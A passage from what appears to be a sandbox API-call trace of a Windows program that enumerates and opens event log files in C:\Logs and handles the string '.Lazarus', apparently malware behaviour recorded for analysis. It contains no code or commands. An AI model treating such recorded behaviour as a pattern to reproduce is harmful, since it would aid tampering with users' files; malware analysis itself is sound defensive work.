Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.864] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf164b9b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcf164b9b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-WMI-Activity%4Operational.evtx", cAlternateFileName="MIFF83~1.EVT")) returned 1 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0072.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0072.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0072.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.865] AreFileApisANSI () returned 1 [0072.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx", lpUsedDefaultChar=0x0) returned 57 [0072.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0072.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0072.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.865] AreFileApisANSI () returned 1 [0072.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0072.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0072.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 57 [0072.865] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.865] GetFileType (hFile=0x428) returned 0x1 [0072.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0072.865] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.866] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.866] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.866] CloseHandle (hObject=0x428) returned 1 [0072.866] AreFileApisANSI () returned 1 [0072.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0072.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0072.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 57 [0072.866] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.866] GetFileType (hFile=0x428) returned 0x1 [0072.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0072.866] CloseHandle (hObject=0x428) returned 1 [0072.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0072.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0072.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0072.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0072.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0073.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0073.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0073.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0073.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0073.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0073.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0073.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0073.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0073.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0073.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0073.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0073.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0073.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0073.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0073.091] AreFileApisANSI () returned 1 [0073.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0073.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0073.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 57 [0073.091] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf164b9b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcf164b9b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000)) returned 1 [0073.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0073.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0073.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0073.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0073.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.092] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9a458f4, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Security.evtx", cAlternateFileName="SECURI~1.EVT")) returned 1 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0073.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0073.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0073.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0073.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0073.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0073.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0073.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0073.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.093] AreFileApisANSI () returned 1 [0073.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Security.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Security.evtx", lpUsedDefaultChar=0x0) returned 22 [0073.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0073.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0073.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0073.093] AreFileApisANSI () returned 1 [0073.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0073.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e458 [0073.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x4e458, cchWideChar=22 | out: lpWideCharStr="C:\\Logs\\Security.evtx") returned 22 [0073.093] CreateFileW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0073.094] GetFileType (hFile=0x428) returned 0x1 [0073.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0073.094] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0073.094] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0073.094] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0073.095] CloseHandle (hObject=0x428) returned 1 [0073.095] AreFileApisANSI () returned 1 [0073.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0073.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0073.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x4e340, cchWideChar=22 | out: lpWideCharStr="C:\\Logs\\Security.evtx") returned 22 [0073.095] CreateFileW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0073.095] GetFileType (hFile=0x428) returned 0x1 [0073.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0073.095] CloseHandle (hObject=0x428) returned 1 [0073.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0073.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0073.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0073.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0073.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0073.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0073.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.096] AreFileApisANSI () returned 1 [0073.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0073.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e458 [0073.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x4e458, cchWideChar=22 | out: lpWideCharStr="C:\\Logs\\Security.evtx") returned 22 [0073.096] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9a458f4, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000)) returned 1 [0073.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0073.097] AreFileApisANSI () returned 1 [0073.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0073.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0073.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0073.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0073.098] GetLastError () returned 0x0 [0073.098] SetLastError (dwErrCode=0x0) [0073.098] AreFileApisANSI () returned 1 [0073.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0073.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3e8 [0073.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x4e3e8, cchWideChar=22 | out: lpWideCharStr="C:\\Logs\\Security.evtx") returned 22 [0073.098] CreateFileW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0073.098] GetFileType (hFile=0x428) returned 0x1 [0073.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0073.098] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0073.098] ReadFile (in: hFile=0x428, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0073.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0073.103] ReadFile (in: hFile=0x428, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0073.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0073.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0073.104] 